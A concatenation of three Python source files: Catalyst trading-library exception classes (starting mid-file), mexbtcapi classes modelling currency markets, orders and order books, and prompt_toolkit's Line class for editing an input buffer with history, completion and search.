'{exchange} does not support candle frequency {freq}, please choose '
'from: {freqs}.'
).strip()
class InvalidHistoryTimeframeError(ZiplineError):
msg = (
'CCXT timeframe {timeframe} not supported by the exchange.'
).strip()
class MismatchingFrequencyError(ZiplineError):
msg = (
'Bar aggregate frequency {frequency} not compatible with '
'data frequency {data_frequency}.'
).strip()
class InvalidSymbolError(ZiplineError):
msg = (
'Invalid trading pair symbol: {symbol}. '
'Catalyst symbols must follow this convention: '
'[Base Currency]_[Quote Currency]. For example: eth_usd, btc_usd, '
'neo_eth, ubq_btc. Error details: {error}'
).strip()
class InvalidOrderStyle(ZiplineError):
msg = (
'Order style {style} not supported by exchange {exchange}.'
).strip()
class CreateOrderError(ZiplineError):
msg = (
'Unable to create order on exchange {exchange} {error}.'
).strip()
class OrderNotFound(ZiplineError):
msg = (
'Order {order_id} not found on exchange {exchange}.'
).strip()
class OrphanOrderError(ZiplineError):
msg = (
'Order {order_id} found in exchange {exchange} but not tracked by '
'the algorithm.'
).strip()
class OrphanOrderReverseError(ZiplineError):
msg = (
'Order {order_id} tracked by algorithm, but not found in exchange '
'{exchange}.'
).strip()
class OrderCancelError(ZiplineError):
msg = (
'Unable to cancel order {order_id} on exchange {exchange} {error}.'
).strip()
class SidHashError(ZiplineError):
msg = (
'Unable to hash sid from symbol {symbol}.'
).strip()
class QuoteCurrencyNotFoundError(ZiplineError):
msg = (
'Algorithm quote currency {quote_currency} not found in account '
'balances on {exchange}: {balances}'
).strip()
class MismatchingQuoteCurrencies(ZiplineError):
msg = (
'Unable to trade with quote currency {quote_currency} when the '
'algorithm uses {algo_currency}.'
).strip()
class MismatchingQuoteCurrenciesExchanges(ZiplineError):
msg = (
'Unable to trade with quote currency {quote_currency} when the '
'exchange {exchange_name} users {exchange_currency}.'
).strip()
class SymbolNotFoundOnExchange(ZiplineError):
"""
Raised when a symbol() call contains a non-existent symbol.
"""
msg = ('Symbol {symbol} not found on exchange {exchange}. '
'Choose from: {supported_symbols}').strip()
class BundleNotFoundError(ZiplineError):
msg = ('Unable to find bundle data for exchange {exchange} and '
'data frequency {data_frequency}.'
'Please ingest some price data.'
'See `catalyst ingest-exchange --help` for details.').strip()
class TempBundleNotFoundError(ZiplineError):
msg = ('Temporary bundle not found in: {path}.').strip()
class EmptyValuesInBundleError(ZiplineError):
msg = ('{name} with end minute {end_minute} has empty rows '
'in ranges: {dates}').strip()
class PricingDataBeforeTradingError(ZiplineError):
msg = ('Pricing data for trading pairs {symbols} on exchange {exchange} '
'starts on {first_trading_day}, but you are either trying to trade '
'or retrieve pricing data on {dt}. Adjust your dates accordingly.'
).strip()
class PricingDataNotLoadedError(ZiplineError):
msg = ('Missing data for {exchange} {symbols} in date range '
'[{start_dt} - {end_dt}]'
'\nPlease run: `catalyst ingest-exchange -x {exchange} -f '
'{data_frequency} -i {symbol_list}`. See catalyst documentation '
'for details.').strip()
class PricingDataValueError(ZiplineError):
msg = ('Unable to retrieve pricing data for {exchange} {symbol} '
'[{start_dt} - {end_dt}]: {error}').strip()
class DataCorruptionError(ZiplineError):
msg = (
'Unable to validate data for {exchange} {symbols} in date range '
'[{start_dt} - {end_dt}]. The data is either corrupted or '
'unavailable. Please try deleting this bundle:'
'\n`catalyst clean-exchange -x {exchange}\n'
'Then, ingest the data again. Please contact the Catalyst team if '
'the issue persists.'
).strip()
class ApiCandlesError(ZiplineError):
msg = (
'Unable to fetch candles from the remote API: {error}.'
).strip()
class NoDataAvailableOnExchange(ZiplineError):
msg = (
'Requested data for trading pair {symbol} is not available on '
'exchange {exchange} '
'in `{data_frequency}` frequency at this time. '
'Check `http://enigma.co/catalyst/status` for market coverage.'
).strip()
class NoValueForField(ZiplineError):
msg = (
'Value not found for field: {field}.'
).strip()
class OrderTypeNotSupported(ZiplineError):
msg = (
'Order type `{order_type}` currently not supported by Catalyst. '
'Please use `limit` or `market` orders only.'
).strip()
class NotEnoughCapitalError(ZiplineError):
msg = (
'Not enough capital on exchange {exchange} for trading. Each '
'exchange should contain at least as much {quote_currency} '
'as the specified `capital_base`. The current balance {balance} is '
'lower than the `capital_base`: {capital_base}'
).strip()
class NotEnoughCashError(ZiplineError):
msg = (
'Total {currency} amount on {exchange} is lower than the cash '
'reserved for this algo: {total} < {cash}. While trades can be made '
'on the exchange accounts outside of the algo, exchange must have '
'enough free {currency} to cover the algo cash.'
).strip()
class LastCandleTooEarlyError(ZiplineError):
msg = (
'The trade date of the last candle {last_traded} is before the '
'specified end date minus one candle {end_dt}. Please verify how '
'{exchange} calculates the start date of OHLCV candles.'
).strip()
class TickerNotFoundError(ZiplineError):
msg = (
'Unable to fetch ticker for {symbol} on {exchange}.'
).strip()
class BalanceNotFoundError(ZiplineError):
msg = (
'{currency} not found in account balance on {exchange}: {balances}.'
).strip()
class BalanceTooLowError(ZiplineError):
msg = (
'Balance for {currency} on {exchange} too low: {free} < {amount}. '
'Positions have likely been sold outside of this algorithm. Please '
'add positions to hold a free amount greater than {amount}, or clean '
'the state of this algo and restart.'
).strip()
class NoCandlesReceivedFromExchange(ZiplineError):
msg = (
'Although requesting {bar_count} candles until {end_dt} of '
'asset {asset}, an empty list of candles was received for {exchange}.'
).strip()
|
|
'''
This module exposes several classes related to currency markets
'''
from datetime import datetime, timedelta
from decimal import Decimal
from abc import ABCMeta, abstractmethod
from collections import defaultdict
import copy
import six
from mexbtcapi.currency import ExchangeRate, Amount, Currency, CurrencyPair
from mexbtcapi import pubsub
from mexbtcapi.util import group_by
class Order(object):
"""Represents an order to sell a number of from_amount for exchange_rate.
If exchange_rate is not defined, this represents a market order (i.e.: to be executed
at any available rate)
"""
class ExecutionError(Exception):
'''Raised when there's a problem executing a order'''
pass
def __init__(self, from_amount, exchange_rate=None, market=None, entity=None, timestamp=None):
assert isinstance(from_amount, Amount)
assert exchange_rate is None or isinstance(exchange_rate, ExchangeRate)
assert market is None or isinstance(market, Market)
assert entity is None or isinstance(entity, Participant)
assert timestamp is None or isinstance(timestamp, datetime)
self.from_amount = from_amount
self.exchange_rate = exchange_rate
self.entity = entity
self._market = market
self.timestamp = timestamp
self._sanity_check()
def _sanity_check(self):
assert self.from_amount.value >= 0
if self._market is not None:
self._market.check_order_valid(self)
@property
def to_amount(self):
return self.exchange_rate.convert(self.from_amount)
@property
def rate(self):
return self.exchange_rate
@property
def market(self):
if self._market is not None:
return self._market
else:
raise Exception("Market is not set on order {}".format(self))
def with_market(self, market):
'''Returns a new Order, with market set to the specified one'''
# pylint: disable=protected-access
assert isinstance(market, Market)
self_copy = copy.copy(self)
self_copy._market = market
self_copy._sanity_check()
return self_copy
def with_from_amount(self, from_amount):
'''Returns a new Order, with amount set to the specified one'''
# pylint: disable=protected-access
assert isinstance(from_amount, Amount)
self_copy = copy.copy(self)
self_copy.from_amount = from_amount
self_copy._sanity_check()
return self_copy
@property
def is_bid(self):
'''returns True iff this order is buying the market's base currency
(and selling the counter currency)'''
return self.from_amount.currency == self.market.counter_currency
@property
def is_ask(self):
'''returns True iff this order is selling the market's base currency
(and buying the counter currency)'''
return self.from_amount.currency == self.market.base_currency
@property
def is_market_order(self):
return self.exchange_rate is None
def __str__(self):
try:
to_amount = self.to_amount
except AttributeError:
to_amount = "?"
return "{0} >> {1}".format(self.from_amount, to_amount)
def __repr__(self):
return "<{0}({1}, {2}, {3}, {4}>".format(self.__class__.__name__, self.from_amount, self.exchange_rate, self._market, self.timestamp)
def __eq__(self, other):
if not isinstance(other, Order):
return False
return hash(self) == hash(other)
def __ne__(self, other):
return not self == other #pylint: disable=unneeded-not
def __hash__(self):
return hash((self.from_amount, self.exchange_rate, self._market))
@six.add_metaclass(ABCMeta)
class Market(object):
"""Represents a market.
On a market, exactly two currencies are exchanged.
The two currencies are known as base and counter.
The base currency is the one around whose unit the prices are quoted.
The counter currency is the one that varies on price quotes.
Example: let's say a market quotes the current price as being 500 USD/BTC.
BTC would be the base currency, and USD the counter currency"""
class InvalidOrder(Exception):
'''raised when there's something wrong with an order, in this
market's context'''
def __init__(self, exchange, counter_currency, base_currency, ticker_stream=None):
assert isinstance(exchange, Exchange)
assert isinstance(counter_currency, Currency)
assert isinstance(base_currency, Currency)
if ticker_stream is not None:
assert isinstance(ticker_stream, pubsub.Publisher)
self.exchange = exchange
self.base_currency = base_currency
self.counter_currency = counter_currency
self._ticker_stream = ticker_stream
@property
def currencies(self):
return CurrencyPair(self.base_currency, self.counter_currency)
@property
def full_name(self):
'''The full name of this market. Includes the currencies'''
full_name = "{exchange} {base_currency}/{counter_currency}".format(**vars(self))
return full_name
@abstractmethod
def get_ticker(self):
"""Returns the most recent ticker"""
raise NotImplementedError()
@property
def ticker_stream(self):
if self._ticker_stream is None:
raise NotImplementedError("This market doesn't provide a ticker stream api")
return self._ticker_stream
@abstractmethod
def get_orderbook(self):
"""Returns the order book"""
raise NotImplementedError()
@abstractmethod
def authenticate(self, *args, **kwargs):
"""returns a ActiveParticipant in this market"""
raise NotImplementedError
def check_order_valid(self, order):
'''checks if an order is adequate in this market'''
er = order.exchange_rate
if order.market and order.market != self:
raise self.InvalidOrder("Order on different market")
if er is not None:
try:
assert set(er.currencies) == set(self.currencies)
except AssertionError:
raise self.InvalidOrder("Invalid order exchange rate")
def __str__(self):
return self.full_name
def __repr__(self):
return "<{0}({1}, {2}, {3})>".format(self.__class__.__name__, self.exchange, self.counter_currency, self.base_currency)
@six.add_metaclass(ABCMeta)
class Exchange(object):
'''A currency exchange.
It can expose several markets'''
def __init__(self, name, market_list):
self.name = name
self.markets = MarketList(market_list)
def __str__(self):
return self.name
def __repr__(self):
return "<{0}({1})>".format(self.__class__.__name__, self.name)
class MarketList(tuple):
'''A searchable list of markets'''
def __init__(self, list_of_markets):
tuple.__init__(self, list_of_markets)
assert all(isinstance(m, Market) for m in self)
self._all = set(self)
self._by_currency = group_by(self, lambda market: (market.base_currency, market.counter_currency), multi=True)
self._by_exchange = group_by(self, lambda market: market.exchange.name.lower())
def find(self, currency1=None, currency2=None, exchange=None):
'''Returns a sublist of contained markets, filtered by the given criteria'''
exchange_name = exchange.name if isinstance(exchange, Exchange) else exchange
results = set(self._all) # make copy
if currency1:
currency1 = Currency(currency1)
results &= self._by_currency[currency1]
if currency2:
currency2 = Currency(currency2)
results &= self._by_currency[currency2]
if exchange_name:
exchange_name_lower = exchange_name.lower() if exchange_name else None
results &= self._by_exchange[exchange_name_lower]
return MarketList(results)
def find_one(self, *args, **kwargs):
'''Calls find() with the same arguments, and returns one result.
Raises IndexError if find() doesn't return exactly one result'''
results = self.find(*args, **kwargs)
if len(results) == 0:
raise IndexError("No markets found for {} {}".format(args, kwargs))
if len(results) > 1:
raise IndexError("More than one market found for {} {}".format(args, kwargs))
assert len(results) == 1
return results[0]
def __repr__(self):
return "<{}({})>".format(self.__class__.__name__, tuple.__repr__(self))
@six.add_metaclass(ABCMeta)
class Participant(object):
"""Represents a participant in a market
"""
def __init__(self, market):
assert isinstance(market, Market)
self.market = market
class PassiveParticipant(Participant):
"""A participant over which the user has no control
"""
pass
@six.add_metaclass(ABCMeta)
class ActiveParticipant(Participant):
"""A participant under user control (may be the user itself)
"""
class ActiveParticipantError(Exception):
"""Base ActiveParticipant error"""
pass
class OrderAlreadyClosedError(ActiveParticipantError):
"""Occurs when trying to cancel a already-closed Order"""
pass
class NotAuthorizedError(ActiveParticipantError):
"""Occurs when the user is not authorized to do the requested operation
"""
pass
@abstractmethod
def place_order(self, order):
"""places an Order in the market"""
pass
@abstractmethod
def cancel_order(self, order):
"""Cancel an existing order"""
pass
@abstractmethod
def get_open_orders(self):
"""Gets all the open orders for this participant"""
pass
class Ticker(object):
"""Ticker datapoint
"""
# time period (in seconds) associated with aggregated fields (high, low, volume, ...)
TIME_PERIOD = timedelta(days=1)
RATE_FIELDS = ('bid', 'ask')
NUMBER_FIELDS = ()
def __init__(self, market, time, **kwargs):
"""
market: the market this ticker is associated with
time: the time at which this ticker was retrieved. This is preferably
the server time, if available; otherwise, the local time.
The time should always be in UTC
kwargs: must contain all the fields defined by RATE_FIELDS and NUMBER_FIELDS
"""
assert isinstance(market, Market)
assert isinstance(time, datetime)
assert all(isinstance(kwargs[k], ExchangeRate) for k in self.RATE_FIELDS)
assert all(isinstance(kwargs[k], (int, long, float, Decimal)) for k in self.NUMBER_FIELDS)
different_fields = set(self.RATE_FIELDS + self.NUMBER_FIELDS) ^ set(kwargs.keys())
if different_fields:
raise Exception("Missing/extra fields: {}".format(different_fields))
self.market, self.time = market, time
self.data = kwargs
vars(self).update(kwargs)
assert self.bid < self.ask # pylint: disable=no-member
def __str__(self):
data_str = ", ".join("{}: {}".format(k, v) for k, v in self.data.items())
return "<{cname}({time}, {data}>".format(cname=self.__class__.__name__, time=self.time, data=data_str)
def __repr__(self):
return "<{cname}({time}, {dict}>".format(cname=self.__class__.__name__, time=self.time, dict=vars(self))
class Orderbook(object):
'''The list of open orders on a market'''
def __init__(self, market, bid_orders, ask_orders):
assert isinstance(market, Market)
assert all(isinstance(x, Order) for x in bid_orders)
assert all(isinstance(x, Order) for x in ask_orders)
assert all(x.is_bid for x in bid_orders)
assert all(x.is_ask for x in ask_orders)
if len(bid_orders):
#bid rates are sorted in descending order
rates = [bid.exchange_rate.rate for bid in bid_orders]
assert rates == sorted(rates, reverse=True)
if len(ask_orders):
#ask rates are sorted in ascending order
rates = [ask.exchange_rate.rate for ask in ask_orders]
assert rates == sorted(rates)
if bid_orders and ask_orders:
assert bid_orders[0].exchange_rate < ask_orders[0].exchange_rate
self.market = market
self.bids = tuple(bid_orders)
self.asks = tuple(ask_orders)
|
|
"""
Data structures for the line input.
It holds the text, cursor position, history, etc...
"""
from __future__ import unicode_literals
from .completion import Completion
from .validation import ValidationError
from .document import Document
from .enums import IncrementalSearchDirection
from .history import History
from .selection import SelectionType, SelectionState
from .utils import EventHook
import os
import six
import subprocess
import tempfile
__all__ = (
'ClipboardData',
'Line',
'SelectionType',
'indent',
'unindent',
)
class ClipboardDataType(object):
"""
Depending on how data has been copied, it can be pasted differently.
If a whole line is copied, it will always be inserted as a line (below or
above thu current one). If a word has been copied, it wiss be pasted
inline. So, if you copy a whole line, it will not be pasted in the middle
of another line.
"""
#: Several characters or words have been copied. They are pasted inline.
CHARACTERS = 'characters'
#: A whole line that has been copied. This will be pasted below or above
#: the current line as a new line.
LINES = 'lines'
class ClipboardData(object):
"""
Text on the clipboard.
:param text: string
:param type: :class:`~.ClipboardDataType`
"""
def __init__(self, text='', type=ClipboardDataType.CHARACTERS):
self.text = text
self.type = type
class CompletionState(object):
def __init__(self, original_document, current_completions=None):
#: Document as it was when the completion started.
self.original_document = original_document
self.original_text_before_cursor = original_document.text_before_cursor
self.original_text_after_cursor = original_document.text_after_cursor
#: List of all the current Completion instances which are possible at
#: this point.
self.current_completions = current_completions or []
#: Position in the `current_completions` array.
#: This can be `None` to indicate "no completion", the original text.
self.complete_index = 0 # Position in the `_completions` array.
@property
def original_cursor_position(self):
self.original_document.cursor_position
def get_new_text_and_position(self):
""" Return (new_text, new_cursor_position) for this completion. """
if self.complete_index is None:
return self.original_document.text, self.original_document.cursor_position
else:
c = self.current_completions[self.complete_index]
if c.start_position == 0:
before = self.original_text_before_cursor
else:
before = self.original_text_before_cursor[:c.start_position]
return before + c.text + self.original_text_after_cursor, len(before) + len(c.text)
class _IncrementalSearchState(object):
def __init__(self, original_cursor_position, original_working_index, direction):
self.isearch_text = ''
self.original_working_index = original_working_index
self.original_cursor_position = original_cursor_position
#: From this character index, we didn't found any more matches.
#: This flag is updated every time we search for a new string.
self.no_match_from_index = None
self.isearch_direction = direction
class Line(object):
"""
The core data structure that holds the text and cursor position of the
current input line and implements all text manupulations on top of it. It
also implements the history, undo stack, reverse search and the completion
state.
:attr completer : :class:`~prompt_toolkit.completion.Completer` instance.
:attr history: :class:`~prompt_toolkit.history.History` instance.
:attr callbacks: :class:`~.Callbacks` instance.
:attr tempfile_suffix: Suffix to be appended to the tempfile for the 'open
in editor' function.
:attr is_multiline: Boolean to indicate whether we should consider this
line a multiline input. If so, the `InputStreamHandler`
can decide to insert newlines when pressing [Enter].
(Instead of accepting the input.)
"""
def __init__(self, completer=None, history=None, validator=None, tempfile_suffix='', is_multiline=False):
self.completer = completer
self.validator = validator
self.is_multiline = is_multiline
self.tempfile_suffix = tempfile_suffix
#: The command line history.
# Note that we shouldn't use a lazy 'or' here. bool(history) could be
# False when empty.
self._history = History() if history is None else history
self._clipboard = ClipboardData()
self.__cursor_position = 0
# Events
self.onTextChanged = EventHook()
self.onTextInsert = EventHook()
self.onCursorPositionChanged = EventHook()
self.reset()
def reset(self, initial_value=''):
self.cursor_position = len(initial_value)
# `ValidationError` instance. (Will be set when the input is wrong.)
self.validation_error = None
# State of Incremental-search
self.isearch_state = None
# State of the selection.
self.selection_state = None
# State of complete browser
self.complete_state = None # For interactive completion through Ctrl-N/Ctrl-P.
# Undo stack
self._undo_stack = [] # Stack of (text, cursor_position)
#: The working lines. Similar to history, except that this can be
#: modified. The user can press arrow_up and edit previous entries.
#: Ctrl-C should reset this, and copy the whole history back in here.
#: Enter should process the current command and append to the real
#: history.
self._working_lines = self._history.strings[:]
self._working_lines.append(initial_value)
self.__working_index = len(self._working_lines) - 1
# <getters/setters>
@property
def text(self):
return self._working_lines[self.working_index]
@text.setter
def text(self, value):
assert isinstance(value, six.text_type), 'Got %r' % value
original_value = self._working_lines[self.working_index]
self._working_lines[self.working_index] = value
if value != original_value:
self._text_changed()
@property
def cursor_position(self):
return self.__cursor_position
@cursor_position.setter
def cursor_position(self, value):
self.__cursor_position = max(0, value)
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
# Note that the cursor position can change if we have a selection the
# new position of the cursor determines the end of the selection.
# fire 'onCursorPositionChanged' event.
self.onCursorPositionChanged.fire()
@property
def working_index(self):
return self.__working_index
@working_index.setter
def working_index(self, value):
self.__working_index = value
self._text_changed()
def _text_changed(self):
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
self.selection_state = None
# fire 'onTextChanged' event.
self.onTextChanged.fire()
# End of <getters/setters>
@property
def document(self):
"""
Return :class:`.Document` instance from the current text and cursor
position.
"""
return Document(self.text, self.cursor_position, selection=self.selection_state)
def save_to_undo_stack(self):
"""
Safe current state (input text and cursor position), so that we can
restore it by calling undo.
"""
# Safe if the text is different from the text at the top of the stack
# is different. If the text is the same, just update the cursor position.
if self._undo_stack and self._undo_stack[-1][0] == self.text:
self._undo_stack[-1] = (self._undo_stack[-1][0], self.cursor_position)
else:
self._undo_stack.append((self.text, self.cursor_position))
def transform_lines(self, line_index_iterator, transform_callback):
"""
Transforms the text on a range of lines.
When the iterator yield an index not in the range of lines that the
document contains, it skips them silently.
To uppercase some lines::
transform_lines(range(5,10), lambda text: text.upper())
:param line_index_iterator: Iterator of line numbers (int)
:param transform_callback: callable that takes the original text of a
line, and return the new text for this line.
"""
# Split lines
lines = self.text.split('\n')
# Apply transformation
for index in line_index_iterator:
try:
lines[index] = transform_callback(lines[index])
except IndexError:
pass
self.text = '\n'.join(lines)
def transform_region(self, from_, to, transform_callback):
"""
Transform a part of the input string.
:param :from_: (int) start position.
:param :to: (int) end position.
:param :transform_callback: Callable which accepts a string and returns
the transformed string.
"""
assert from_ < to
self.text = ''.join([
self.text[:from_] +
transform_callback(self.text[from_:to]) +
self.text[to:]
])
def cursor_left(self, count=1):
self.cursor_position += self.document.get_cursor_left_position(count=count)
def cursor_right(self, count=1):
self.cursor_position += self.document.get_cursor_right_position(count=count)
def cursor_up(self, count=1):
""" (for multiline edit). Move cursor to the previous line. """
self.cursor_position += self.document.get_cursor_up_position(count=count)
def cursor_down(self, count=1):
""" (for multiline edit). Move cursor to the next line. """
self.cursor_position += self.document.get_cursor_down_position(count=count)
def auto_up(self, count=1):
"""
If we're not on the first line (of a multiline input) go a line up,
otherwise go back in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_previous()
elif self.document.cursor_position_row > 0:
self.cursor_position += self.document.get_cursor_up_position(count=count)
elif not self.selection_state:
self.history_backward(count=count)
def auto_down(self, count=1):
"""
If we're not on the last line (of a multiline input) go a line down,
otherwise go forward in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_next()
elif self.document.cursor_position_row < self.document.line_count - 1:
self.cursor_position += self.document.get_cursor_down_position(count=count)
elif not self.selection_state:
old_index = self.working_index
self.history_forward(count=count)
# If we moved to the next line, place the cursor at the beginning.
if old_index != self.working_index:
self.cursor_position = 0
def delete_before_cursor(self, count=1): # TODO: unittest return type
"""
Delete character before cursor, return deleted character.
"""
assert count >= 0
deleted = ''
if self.cursor_position > 0:
deleted = self.text[self.cursor_position - count:self.cursor_position]
self.text = self.text[:self.cursor_position - count] + self.text[self.cursor_position:]
self.cursor_position -= len(deleted)
return deleted
def delete(self, count=1): # TODO: unittest `count`
"""
Delete one character. Return deleted character.
"""
if self.cursor_position < len(self.text):
deleted = self.document.text_after_cursor[:count]
self.text = self.text[:self.cursor_position] + \
self.text[self.cursor_position + len(deleted):]
return deleted
else:
return ''
def join_next_line(self):
"""
Join the next line to the current one by deleting the line ending after
the current line.
"""
self.cursor_position += self.document.get_end_of_line_position()
self.delete()
def swap_characters_before_cursor(self):
"""
Swap the last two characters before the cursor.
"""
pos = self.cursor_position
if pos >= 2:
a = self.text[pos - 2]
b = self.text[pos - 1]
self.text = self.text[:pos-2] + b + a + self.text[pos:]
def go_to_history(self, index):
"""
Go to this item in the history.
"""
if index < len(self._working_lines):
self.working_index = index
self.cursor_position = len(self.text)
def complete_common(self):
"""
Autocomplete. This appends the common part of all the possible completions.
Returns true if there was a completion.
"""
# On the first tab press, try to find one completion and complete.
if self.completer:
result = self.completer.get_common_complete_suffix(self.document)
if result:
self.insert_text(result)
return True
else:
return False
else:
return False
def complete_next(self, count=1, start_at_first=True):
"""
Enter complete mode and browse through the completions.
:param start_at_first: If True, immediately insert the first completion.
"""
if not self.complete_state:
self._start_complete(go_to_first=start_at_first)
else:
completions_count = len(self.complete_state.current_completions)
if self.complete_state.complete_index is None:
index = 0
elif self.complete_state.complete_index == completions_count - 1:
index = None
else:
index = min(completions_count-1, self.complete_state.complete_index + count)
self._go_to_completion(index)
def complete_previous(self, count=1):
"""
Enter complete mode and browse through the completions.
"""
if not self.complete_state:
self._start_complete()
if self.complete_state:
if self.complete_state.complete_index == 0:
index = None
elif self.complete_state.complete_index is None:
index = len(self.complete_state.current_completions) - 1
else:
index = max(0, self.complete_state.complete_index - count)
self._go_to_completion(index)
def cancel_completion(self):
"""
Cancel completion, go back to the original text.
"""
if self.complete_state:
self._go_to_completion(None)
self.complete_state = None
def _start_complete(self, go_to_first=True, completions=None):
"""
Start completions. (Generate list of completions and initialize.)
"""
# Generate list of all completions.
if completions is None:
if self.completer:
completions = list(self.completer.get_completions(self.document))
else:
completions = []
if completions:
self.complete_state = CompletionState(
original_document=self.document,
current_completions=completions)
if go_to_first:
self._go_to_completion(0)
else:
self._go_to_completion(None)
else:
self.complete_state = None
def start_history_lines_completion(self):
"""
Start a completion based on all the other lines in the document and the
history.
"""
found_completions = set()
completions = []
# For every line of the whole history, find matches with the current line.
current_line = self.document.current_line_before_cursor.lstrip()
for i, string in enumerate(self._working_lines):
for j, l in enumerate(string.split('\n')):
l = l.strip()
if l and l.startswith(current_line):
# When a new line has been found.
if l not in found_completions:
found_completions.add(l)
# Create completion.
if i == self.working_index:
display_meta = "Current, line %s" % (j+1)
else:
display_meta = "History %s, line %s" % (i+1, j+1)
completions.append(Completion(
l,
start_position=-len(current_line),
display_meta=display_meta))
self._start_complete(completions=completions[::-1])
def _go_to_completion(self, index):
"""
Select a completion from the list of current completions.
"""
assert self.complete_state
state = self.complete_state
# Set new completion
self.complete_state.complete_index = index
# Set text/cursor position
self.text, self.cursor_position = self.complete_state.get_new_text_and_position()
# (changing text/cursor position will unset complete_state.)
self.complete_state = state
def history_forward(self, count=1):
if self.working_index < len(self._working_lines) - count:
# Go forward in history, and update cursor_position.
self.working_index += count
self.cursor_position = len(self.text)
def history_backward(self, count=1):
if self.working_index - count >= 0:
# Go back in history, and update cursor_position.
self.working_index -= count
self.cursor_position = len(self.text)
def start_selection(self, selection_type=SelectionType.CHARACTERS):
"""
Take the current cursor position as the start of this selection.
"""
self.selection_state = SelectionState(self.cursor_position, selection_type)
def copy_selection(self, _cut=False):
"""
Copy selected text and return it as string.
"""
if self.selection_state:
# Take start and end of selection
from_, to = self.document.selection_range()
copied_text = self.text[from_:to]
# If cutting, remove the text and set the new cursor position.
if _cut:
self.text = self.text[:from_] + self.text[to + 1:]
self.cursor_position = min(from_, to)
self.selection_state = None
return copied_text
else:
return ''
def cut_selection(self):
"""
Delete the selected text and return it as string.
"""
return self.copy_selection(_cut=True)
def newline(self):
self.insert_text('\n')
def insert_line_above(self, copy_margin=True):
"""
Insert a new line above the current one.
"""
if copy_margin:
insert = self.document.leading_whitespace_in_current_line + '\n'
else:
insert = '\n'
self.cursor_position += self.document.get_start_of_line_position()
self.insert_text(insert)
self.cursor_position -= 1
def insert_line_below(self, copy_margin=True):
"""
Insert a new line below the current one.
"""
if copy_margin:
insert = '\n' + self.document.leading_whitespace_in_current_line
else:
insert = '\n'
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(insert)
def set_search_text(self, text):
if not self.isearch_state:
self.start_isearch()
# When backspace has been pressed.
if self.isearch_state.no_match_from_index and \
self.isearch_state.isearch_text.startswith(text):
if len(text) < self.isearch_state.no_match_from_index:
self.isearch_state.no_match_from_index = None
# When not appending text.
# (When `text` is not a suffix of the search string that we had.)
elif not text.startswith(self.isearch_state.isearch_text):
self.isearch_state.no_match_from_index = None
self.working_index = self.isearch_state.original_working_index
self.cursor_position = self.isearch_state.original_cursor_position
self.isearch_state.isearch_text = text
if not self.document.has_match_at_current_position(self.isearch_state.isearch_text):
found = self.incremental_search(self.isearch_state.isearch_direction)
# When this suffix is not found, remember that in `no_match_from_index`.
if not found and self.isearch_state.no_match_from_index is None:
self.isearch_state.no_match_from_index = len(self.isearch_state.isearch_text) - 1
def insert_text(self, data, overwrite=False, move_cursor=True):
"""
Insert characters at cursor position.
"""
# In insert/text mode.
if overwrite:
# Don't overwrite the newline itself. Just before the line ending, it should act like insert mode.
overwritten_text = self.text[self.cursor_position:self.cursor_position+len(data)]
if '\n' in overwritten_text:
overwritten_text = overwritten_text[:overwritten_text.find('\n')]
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position+len(overwritten_text):]
else:
self.text = self.text[:self.cursor_position] + data + self.text[self.cursor_position:]
if move_cursor:
self.cursor_position += len(data)
# fire 'onTextInsert' event.
self.onTextInsert.fire()
def set_clipboard(self, clipboard_data):
"""
Set data to the clipboard.
:param clipboard_data: :class:`~.ClipboardData` instance.
"""
self._clipboard = clipboard_data
def paste_from_clipboard(self, before=False, count=1):
"""
Insert the data from the clipboard.
"""
if self._clipboard and self._clipboard.text:
if self._clipboard.type == ClipboardDataType.CHARACTERS:
if before:
self.insert_text(self._clipboard.text * count)
else:
self.cursor_right()
self.insert_text(self._clipboard.text * count)
self.cursor_left()
elif self._clipboard.type == ClipboardDataType.LINES:
if before:
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=False)
self.insert_text((self._clipboard.text + '\n') * count, move_cursor=False)
else:
self.cursor_position += self.document.get_end_of_line_position()
self.insert_text(('\n' + self._clipboard.text) * count, move_cursor=False)
self.cursor_down()
self.cursor_position += self.document.get_start_of_line_position(after_whitespace=True)
def undo(self):
# Pop from the undo-stack until we find a text that if different from
# the current text. (The current logic of `save_to_undo_stack` will
# make sure that the top of the undo stack is usually the same as the
# current text, so in that case we have to pop twice.)
while self._undo_stack:
text, pos = self._undo_stack.pop()
if text != self.text:
self.text = text
self.cursor_position = pos
return
def validate(self):
"""
Returns `True` if valid.
"""
self.validation_error = None
# Validate first. If not valid, set validation exception.
if self.validator:
try:
self.validator.validate(self.document)
except ValidationError as e:
# Set cursor position (don't allow invalid values.)
cursor_position = self.document.translate_row_col_to_index(e.line, e.column)
self.cursor_position = min(max(0, cursor_position), len(self.text))
self.validation_error = e
return False
return True
def add_to_history(self): # TODO: Rename to `append_to_history`
"""
Append the current input to the history.
(Only if valid input.)
"""
# Validate first. If not valid, set validation exception.
if not self.validate():
return
# Save at the tail of the history. (But don't if the last entry the
# history is already the same.)
if self.text and (not len(self._history) or self._history[-1] != self.text):
self._history.append(self.text)
def start_isearch(self, direction=IncrementalSearchDirection.FORWARD):
"""
Start incremental search.
Take the current position as the start position for the search.
"""
self.isearch_state = _IncrementalSearchState(
original_cursor_position=self.cursor_position,
original_working_index=self.working_index,
direction=direction)
def incremental_search(self, direction):
"""
Search for the next string.
:returns: (bool) True if something was found.
"""
if not self.isearch_state:
self.start_isearch()
found = False
self.isearch_state.isearch_direction = direction
isearch_text = self.isearch_state.isearch_text
if direction == IncrementalSearchDirection.BACKWARD:
# Try find at the current input.
new_index = self.document.find_backwards(isearch_text)
if new_index is not None:
self.cursor_position += new_index
found = True
else:
# No match, go back in the history.
for i in range(self.working_index - 1, -1, -1):
document = Document(self._working_lines[i], len(self._working_lines[i]))
new_index = document.find_backwards(isearch_text)
if new_index is not None:
self.working_index = i
self.cursor_position = len(self._working_lines[i]) + new_index
self.isearch_state.no_match_from_index = None
found = True
break
else:
# Try find at the current input.
new_index = self.document.find(isearch_text)
if new_index is not None:
self.cursor_position += new_index
found = True
else:
# No match, go forward in the history.
for i in range(self.working_index + 1, len(self._working_lines)):
document = Document(self._working_lines[i], 0)
new_index = document.find(isearch_text, include_current_position=True)
if new_index is not None:
self.working_index = i
self.cursor_position = new_index
self.isearch_state.no_match_from_index = None
found = True
break
else:
# If no break: we didn't found a match.
found = False
return found
